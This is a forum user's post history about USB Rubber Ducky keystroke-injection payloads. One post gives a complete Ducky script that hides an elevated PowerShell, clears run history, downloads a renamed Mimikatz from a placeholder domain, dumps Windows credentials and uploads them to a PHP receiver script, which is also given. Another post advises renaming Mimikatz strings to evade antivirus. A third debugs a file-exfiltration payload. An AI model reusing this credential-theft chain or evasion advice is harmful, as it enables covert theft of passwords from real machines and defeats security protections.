Sh4d0wm4n

Members, 5 posts
  1. As far as I know, the ducky-decode scripts allow you just to decode a bin to its original Ducky script. How can you add mass storage/multiple payloads with it? Sorry for replying with another question ;)
  2. Hello everybody, you can get my modified invoke-mimikatz.ps1 (renamed md.ps1) from this link: https://goo.gl/FoLS0P

     While this is the Duck script:

         DELAY 1000
         GUI r
         DELAY 300
         STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
         ENTER
         DELAY 500
         REM ALT y
         LEFTARROW
         DELAY 300
         ENTER
         DELAY 300
         STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://your.domain/md.ps1'); $o = Invoke-Mimidogz -DumpCred; (New-Object Net.WebClient).UploadString('https://your.domain/rx.php', $o)"&exit
         ENTER

     And this is the rx.php file content, which you need to put on your server to receive the credentials:

         <?php
         date_default_timezone_set('Europe/Rome');
         $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".txt";
         file_put_contents($file, file_get_contents("php://input"));
         ?>
  3. I forgot to mention also that the minimum number of columns for a PowerShell window is now 20. No longer 18, or it will not shrink. P.S. Is there a way to edit a post after posting it?! I cannot find it.
  4. His script is not out of order; it is in fact exactly the new version introduced in this very useful post from the OP. The history cleaning is performed only when the PowerShell process shuts down/exits. ;) For your info, many AVs, including Windows Defender, are now able to detect the invoke-mimikatz.ps1 script. But never trust your AV too much, as there is always an easy workaround ;) Check this post for detailed instructions: http://www.blackhillsinfosec.com/?p=5555 Basically you just need to modify the original invoke-mimikatz.ps1 script, substituting every "mimikatz" word with another one (mimidogz?). I've also found an alternate and lighter version (400K vs 2.5Mb) of the original invoke-mimikatz script, which is also not detected: but with this one you need to type the commands interactively: no --DumpCreds switch. Here: https://gist.github.com/subTee/0a3b56ac743e8d1eeab0 I've already tested both and they work like a charm, until a future 'cheap' AV update... ;)
  5. Hello everyone, I'm talking about this recent payload: https://www.hak5.org/blog/hak5/stealing-files-with-the-usb-rubber-ducky-usb-exfiltration-explained

     The bug is in the e.cmd file, where the folder name is created, depending on date and time:

         REM Creates directory compromised of computer name, date and time
         REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
         set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%

     Thanks to the fact that I always do my hacking homework at night, I discovered that the time is not always 11 characters long; in fact it could be like this: 2:34:54 instead of 02:34:54. So, if you are executing the script at night, you'll have a folder name containing an empty character, like NAME_10122017_ 23454, and this is causing issues later when the script has to copy the files to this folder. The responsible script part is this: %time:~-11,2%, where it always goes back 11 characters to get the first two numbers, but it finds just one. I did not have the time to modify it to make it work every"time" ;), but it should be easy to do. I just wanted all of you to know about it ;) Cheers